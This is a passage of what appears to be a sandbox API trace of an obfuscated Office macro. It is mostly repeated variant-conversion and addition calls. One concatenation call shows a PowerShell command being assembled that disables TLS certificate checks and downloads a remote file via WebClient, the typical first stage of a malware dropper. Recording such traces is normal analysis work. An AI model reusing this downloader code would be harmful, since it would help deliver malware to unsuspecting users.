psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.304] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.305] GetUserDefaultLCID () returned 0x409 [0047.305] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.305] GetUserDefaultLCID () returned 0x409 [0047.305] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.305] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.306] GetUserDefaultLCID () returned 0x409 [0047.306] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.306] GetUserDefaultLCID () returned 0x409 [0047.306] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.306] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.307] GetUserDefaultLCID () returned 0x409 [0047.307] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.307] GetUserDefaultLCID () returned 0x409 [0047.307] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.308] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.308] GetUserDefaultLCID () returned 0x409 [0047.309] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.309] GetUserDefaultLCID () returned 0x409 [0047.309] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.309] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.310] GetUserDefaultLCID () returned 0x409 [0047.310] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.310] GetUserDefaultLCID () returned 0x409 [0047.310] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.310] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.311] GetUserDefaultLCID () returned 0x409 [0047.311] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.311] GetUserDefaultLCID () returned 0x409 [0047.311] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.311] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.312] GetUserDefaultLCID () returned 0x409 [0047.313] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.313] GetUserDefaultLCID () returned 0x409 [0047.313] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.313] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.314] GetUserDefaultLCID () returned 0x409 [0047.314] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.314] GetUserDefaultLCID () returned 0x409 [0047.314] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.314] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.315] GetUserDefaultLCID () returned 0x409 [0047.315] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.315] GetUserDefaultLCID () returned 0x409 [0047.315] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.315] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.316] GetUserDefaultLCID () returned 0x409 [0047.316] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.316] GetUserDefaultLCID () returned 0x409 [0047.317] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.317] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.318] GetUserDefaultLCID () returned 0x409 [0047.318] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.318] GetUserDefaultLCID () returned 0x409 [0047.318] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.318] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.319] GetUserDefaultLCID () returned 0x409 [0047.319] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.319] GetUserDefaultLCID () returned 0x409 [0047.319] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.319] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.320] GetUserDefaultLCID () returned 0x409 [0047.320] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.320] GetUserDefaultLCID () returned 0x409 [0047.320] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.320] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.321] GetUserDefaultLCID () returned 0x409 [0047.321] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.322] GetUserDefaultLCID () returned 0x409 [0047.322] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.322] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.323] GetUserDefaultLCID () returned 0x409 [0047.323] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.323] GetUserDefaultLCID () returned 0x409 [0047.323] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.323] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.324] GetUserDefaultLCID () returned 0x409 [0047.324] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.324] GetUserDefaultLCID () returned 0x409 [0047.324] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.324] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.326] GetUserDefaultLCID () returned 0x409 [0047.326] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.326] GetUserDefaultLCID () returned 0x409 [0047.326] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.327] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.328] GetUserDefaultLCID () returned 0x409 [0047.328] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.328] GetUserDefaultLCID () returned 0x409 [0047.328] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.328] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.329] GetUserDefaultLCID () returned 0x409 [0047.329] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.329] GetUserDefaultLCID () returned 0x409 [0047.329] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.329] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.330] GetUserDefaultLCID () returned 0x409 [0047.330] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.330] GetUserDefaultLCID () returned 0x409 [0047.330] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.330] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.331] GetUserDefaultLCID () returned 0x409 [0047.331] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.331] GetUserDefaultLCID () returned 0x409 [0047.331] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.332] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.332] VarBstrCat (in: bstrLeft="powershell.exe \"<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-o", bstrRight="bject system.net.webclient <#replace ext#> ).downloadfile($strin", pbstrResult=0x205f70 | out: pbstrResult=0x205f70) returned 0x0 [0047.334] GetUserDefaultLCID () returned 0x409 [0047.334] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\x01݉") returned 0x0 [0047.334] GetUserDefaultLCID () returned 0x409 [0047.334] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.334] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.335] GetUserDefaultLCID () returned 0x409 [0047.335] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.335] GetUserDefaultLCID () returned 0x409 [0047.335] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.335] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.336] GetUserDefaultLCID () returned 0x409 [0047.336] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.336] GetUserDefaultLCID () returned 0x409 [0047.336] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.336] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.337] GetUserDefaultLCID () returned 0x409 [0047.337] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.337] GetUserDefaultLCID () returned 0x409 [0047.338] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.338] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.339] GetUserDefaultLCID () returned 0x409 [0047.339] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.339] GetUserDefaultLCID () returned 0x409 [0047.339] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.339] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.340] GetUserDefaultLCID () returned 0x409 [0047.340] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.340] GetUserDefaultLCID () returned 0x409 [0047.340] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.340] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.341] GetUserDefaultLCID () returned 0x409 [0047.341] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.341] GetUserDefaultLCID () returned 0x409 [0047.341] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.341] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.342] GetUserDefaultLCID () returned 0x409 [0047.342] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.342] GetUserDefaultLCID () returned 0x409 [0047.342] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.342] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.343] GetUserDefaultLCID () returned 0x409 [0047.343] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.344] GetUserDefaultLCID () returned 0x409 [0047.344] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.344] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.345] GetUserDefaultLCID () returned 0x409 [0047.345] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.345] GetUserDefaultLCID () returned 0x409 [0047.345] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.345] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.346] GetUserDefaultLCID () returned 0x409 [0047.346] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.346] GetUserDefaultLCID () returned 0x409 [0047.346] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.346] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.347] GetUserDefaultLCID () returned 0x409 [0047.347] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.347] GetUserDefaultLCID () returned 0x409 [0047.347] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.347] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.348] GetUserDefaultLCID () returned 0x409 [0047.348] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.348] GetUserDefaultLCID () returned 0x409 [0047.348] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.348] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.349] GetUserDefaultLCID () returned 0x409 [0047.349] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.350] GetUserDefaultLCID () returned 0x409 [0047.350] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.350] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.351] GetUserDefaultLCID () returned 0x409 [0047.351] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.351] GetUserDefaultLCID () returned 0x409 [0047.351] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.351] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.352] GetUserDefaultLCID () returned 0x409 [0047.352] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.352] GetUserDefaultLCID () returned 0x409 [0047.352] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.352] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.353] GetUserDefaultLCID () returned 0x409 [0047.353] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.353] GetUserDefaultLCID () returned 0x409 [0047.353] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.353] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.354] GetUserDefaultLCID () returned 0x409 [0047.354] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.355] GetUserDefaultLCID () returned 0x409 [0047.355] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.355] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.356] GetUserDefaultLCID () returned 0x409 [0047.356] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.356] GetUserDefaultLCID () returned 0x409 [0047.356] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.356] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.357] GetUserDefaultLCID () returned 0x409 [0047.357] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.357] GetUserDefaultLCID () returned 0x409 [0047.357] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.357] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.358] GetUserDefaultLCID () returned 0x409 [0047.358] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.359] GetUserDefaultLCID () returned 0x409 [0047.359] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.359] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.360] GetUserDefaultLCID () returned 0x409 [0047.360] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.360] GetUserDefaultLCID () returned 0x409 [0047.360] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.360] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.361] GetUserDefaultLCID () returned 0x409 [0047.361] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.361] GetUserDefaultLCID () returned 0x409 [0047.361] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.361] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.362] GetUserDefaultLCID () returned 0x409 [0047.362] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.362] GetUserDefaultLCID () returned 0x409 [0047.362] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.362] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.363] GetUserDefaultLCID () returned 0x409 [0047.363] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.364] GetUserDefaultLCID () returned 0x409 [0047.364] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.364] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.365] GetUserDefaultLCID () returned 0x409 [0047.365] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.365] GetUserDefaultLCID () returned 0x409 [0047.365] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.365] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.366] GetUserDefaultLCID () returned 0x409 [0047.366] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.366] GetUserDefaultLCID () returned 0x409 [0047.366] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.366] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.367] GetUserDefaultLCID () returned 0x409 [0047.367] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.367] GetUserDefaultLCID () returned 0x409 [0047.367] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.367] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.368] GetUserDefaultLCID () returned 0x409 [0047.368] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.369] GetUserDefaultLCID () returned 0x409 [0047.369] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.369] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.370] GetUserDefaultLCID () returned 0x409 [0047.370] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.370] GetUserDefaultLCID () returned 0x409 [0047.370] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.370] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.371] GetUserDefaultLCID () returned 0x409 [0047.371] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.371] GetUserDefaultLCID () returned 0x409 [0047.371] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.371] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.372] GetUserDefaultLCID () returned 0x409 [0047.372] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.372] GetUserDefaultLCID () returned 0x409 [0047.373] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.373] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.374] GetUserDefaultLCID () returned 0x409 [0047.374] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.374] GetUserDefaultLCID () returned 0x409 [0047.374] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.374] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.375] GetUserDefaultLCID () returned 0x409 [0047.375] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.375] GetUserDefaultLCID () returned 0x409 [0047.375] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.375] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.376] GetUserDefaultLCID () returned 0x409 [0047.376] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.377] GetUserDefaultLCID () returned 0x409 